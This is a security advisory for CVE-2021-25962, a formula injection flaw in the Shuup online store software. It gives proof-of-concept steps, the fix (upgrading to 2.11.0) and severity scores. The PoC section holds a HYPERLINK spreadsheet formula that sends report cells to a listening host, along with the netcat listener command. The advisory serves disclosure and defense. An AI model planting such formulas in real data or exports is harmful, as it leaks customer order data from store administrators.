icon

We found results for “

CVE-2021-25962

Date: September 29, 2021

Overview

“Shuup” application in versions 0.4.2 to 2.10.8 is affected by the “Formula Injection” vulnerability. A customer can inject payloads in the name input field in the billing address while buying a product. When a store administrator accesses the reports page to export the data as an Excel file and opens it, the payload gets executed.

Details

“Shuup” application is affected by the “Formula Injection” vulnerability. A customer can inject payloads in the name input field in the billing address while buying a product. When a store administrator accesses the reports page to export the data as an Excel file and opens it, the payload gets executed.

PoC Details

browse the application (In our case: 0.0.0.0:9000) and add a product to the cart. Click on the cart and click “proceed to checkout”. Fill the needed information in the form as you like and make sure you enter the payload given below in the name field (the first field). Press continue until you get to a page saying the order is complete.
Now browse to the admin panel (0.0.0.0:9000/sa) and go to the reports page found in the menu (on the top left).
Open a terminal and make sure you listen on some port (in our case: 4444).
Now login into the application as the store administrator with the admin credentials. Navigate to Reports tab and select the report type as Orders Report and output format as Excel. Check the Download option and click on Get Report at the bottom of the page.
Open the report and click on the payload (“Click here” in the table). Clicking the link will send the content of cells A3 and B3 in the report table to the attacker.
As the attacker, check the terminal and you will see an HTTP GET request sent with the order reference and the date and time of the order.

PoC Code

// Payload
=HYPERLINK("http://0.0.0.0:4444?x="&A3&B3,"Click Here")

// Command to listen to port 4444
sudo nc -l 4444

Affected Environments

Shuup 0.4.2 - 2.10.8

Prevention

Upgrade to Shuup 2.11.0 or higher

Language: Python

Good to know:

icon
icon

Improper Neutralization of Formula Elements in a CSV File

CWE-1236
icon

Upgrade Version

Upgrade to version shuup - 2.11.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): None
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial
Additional information: